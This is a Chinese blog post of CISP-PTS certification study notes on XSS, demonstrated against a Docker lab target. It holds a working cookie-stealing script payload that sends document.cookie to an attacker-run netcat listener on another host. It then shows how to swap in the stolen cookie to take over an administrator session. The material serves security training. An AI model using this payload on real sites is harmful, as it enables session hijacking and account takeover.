CISP-PTS学习笔记-XSS

最新推荐文章于 2024-05-18 10:55:10 发布
最新推荐文章于 2024-05-18 10:55:10 发布
阅读量987 收藏 2
点赞数
分类专栏: CISP-PTS学习笔记 文章标签: 学习 xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34236803/article/details/125472797
版权
本文记录了CISP-PTS学习中关于XSS漏洞的识别和利用,重点讲解如何通过XSS获取Cookie,包括环境搭建、极简式XSS示例以及利用Netcat(nc)监听服务来捕获Cookie,从而实现权限提升。核心知识点在于理解攻击者如何通过篡改Cookie获取管理员权限。
摘要由CSDN通过智能技术生成

00 环境搭建

XSS靶场c0ny1/xssed

docker pull c0ny1/xssed
docker run -d -p 85:80 c0ny1/xssed

http://172.16.243.133:85/
在这里插入图片描述

01 XSS漏洞识别

极简式

<img src=x>

在这里插入图片描述

获取cookie(重点)

启动一个nc服务

nc -lvvp 888

使用payload插入存储型/反射性XSS ,一般是留言,公告等位置。

<script> document.location="http://172.16.243.129:888?id="+document.cookie</script>

nc获取到cookie
在这里插入图片描述
将cookie替换成浏览器cookie并刷新页面
在这里插入图片描述
核心知识点是普通用户获取管理员用户cookie ,刷新页面后得到管理员权限。

吾爱测试
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cisp-pts学习笔记-sql注入
文公子的博客
06-26 418
使用docker 部署 1.联合查询(重点考) 联合查询注入是回显注入的一种,也可以说联合注入的前提是,页面上要有回显位。那又引出了另一问题,什么是回显位? 在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫回显位。 order by 列数 http://172.16.243.133:81/Less-1/?id=1’ order by 4–+ http://172.16.243.133:81/Less-1/?id=1’ order by 3–+
CISP培训资料
06-25
CISP信息安全保障CISP信息安全保障CISP信息安全保障CISP信息安全保障
CISP-PTS考试通关经验总结-网络安全(自学)
MachineGunJoe666
03-29 1151
先来总结一下考证经历,试题难度还是有的,不过因为是报班考的(也只能通过培训机构报),所以,很多题目都在平常练习中会有涉及,考前也会有一些特训啥的,考起来也不是说特别难截止至2023年10月24日,据中国信息安全评测中心数据,目前PTS和PTE持证人数大概是 720和 7484 左右关于培训和考试时间,当时找了好几家培训机构,发现他们培训时间多数都是工作日的,想找周末的,最终同事找了家机构,然后一起抱团考,还可以打个折。不过考试时间,基本都是工作日的,其实也还好,考试 4 个小时,请半天假就OK。
CISP-PTS考试通关经验总结
最新发布
Python_paipai的博客
05-18 383
先来总结一下考证经历,试题难度还是有的,不过因为是报班考的(也只能通过培训机构报),所以,很多题目都在平常练习中会有涉及,考前也会有一些特训啥的,考起来也不是说特别难截止至2023年10月24日,据中国信息安全评测中心数据,目前PTS和PTE持证人数大概是 720和 7484 左右关于培训和考试时间,当时找了好几家培训机构,发现他们培训时间多数都是工作日的,想找周末的,最终同事找了家机构,然后一起抱团考,还可以打个折。不过考试时间,基本都是工作日的,其实也还好,考试 4 个小时,请半天假就OK。
全国注册渗透测试专家(CISP-PTS)官方培训PPT资料。
05-27
1、官方培训PPT资料 2、技术全面,细致。 3、对考点有全面的总结 4、材料是重点知识点的汇总,不是教材哦。 5、使用方式: 这个PPT是收集到的PTS讲师多年的技术总结,有各知识点详细的命令总结和技巧汇总。建议在学习完相关知识点后,再查看此份PPT进行差缺补漏。梳理出哪几个知识点不懂,哪几个工具没接触过,哪些操作不理解。找出弱项后逐一加强学习
CISP PTE-PTS白皮书.pdf
08-12
CISP-PTE
2024年CISP-PTE CISP-PTS认证考试要点整理_pte被安全检查要多久才能出来
2401_84265571的博客
05-10 1038
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。实操题共 80 分。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
CISP-PTE 基础讲解
beirry的博客
12-09 1184
此篇文章是写给对于对安全行业的术语没有一个了解的初学者。
CISP-DSG培训课件
05-31
CISP-DSG数据安全治理培训课件》是一份深度探讨数据安全治理的专业学习资料,旨在提升相关人员在数据安全领域的知识与技能。CISP-DSG,全称为Certified Information Security Professional - Data Security ...
CISP-DSG学习资料(侵权删)
02-16
“ 注册数据安全治理专业人员”,英文为 Certified Information Security Professional - Data Security Governance , 简称 CISP-DSG , 是中国信息安全测评中心联合天融信开发的针对数据安全人才的培养认证, 是...
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
推荐,注册信息安全专业人员渗透测试工程师(CISP-PTE)认证培训课件资料合集,共18份。 001-Linux操作系统安全V2.0.pptx 002-Windows操作系统安全V2.0.pptx 003-数据库安全.pptx 004-Web安全基础0 - 介绍.pptx 005...
CISP-PTE讲义.zip
11-08
CISP-PTE认证教程讲义 001-linux操作系统安全V2.0 002-windows操作系统安全V2.0 003-数据库安全 004-Web安全基础0 005-Web安全基础1 - HTTP协议 006-Web安全基础2 - 注入漏洞 007-Web安全基础3 - XSS漏洞 008-Web安全基础4 - 请求伪造漏洞 009-Web安全基础5 - 文件处理漏洞 010-Web安全基础6 - 访问控制漏洞 011-Web安全基础7 - 会话管理漏洞 012-Web安全基础8 - 实战练习 013-Apache-finished 014-IIS 015-jboss 016-tomcat 017-weblogic(2) 018-web应用服务器安全加固
CISP-PTE讲义PPT.zip
02-03
谷安的CISP-PTE的培训资料,象征性收点搬运费
CISP考试练习题库
07-14
CISP考试练习题库2017年版本,修改了几次,最终使用不变了 祝各位考试顺利!
CISP教程最全培训课件
02-18
CISP全部培训教程,对于学习网络安全有非常重要的参考价值和学习价值
cisp-pte考试环境下载-原题 题库
04-01
注册信息安全专业人员-渗透测试方向注册考试是为了锻炼考生实际解决网络安全问题的能力,有效提升我国网络安全防御能力,促进国家企事业单位网络安全健康发展,为发现人才,选拔优秀人才而设立的技能水平注册考试。 本考试为业内首家实操型渗透测试技术水平注册考试,考试内容从多个角度出发,将客观题与实操题两者结合,来考核考生的全面能力。通过多个得分点,充分检验考生对于最新网络安全技术的掌握程度,展现考生在真实的网络环境中发现问题和解决问题的能力。确保通过考试的考生能在实际工作中独当一面。
cisp教材全套
08-27
cisp教材全套,最全的CISP电子版教材,总共20章节分20个PDF文件
2022年CISP-PTE/CISP-PTS认证考试要点整理
公众号:乌云安全
11-03 2097
CISP-PTE考证/CISP-PTS认证考试要点整理
cisp-pts讲义教材
06-20
总之,CISP-PTS讲义教材对于学习计算机网络安全和信息安全来说至关重要,它不仅提供了系统的理论知识和实用技术,还帮助学习者掌握各种安全应对策略和解决方法。对于从业者来说,学习和掌握该教材的内容可以帮助他们...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值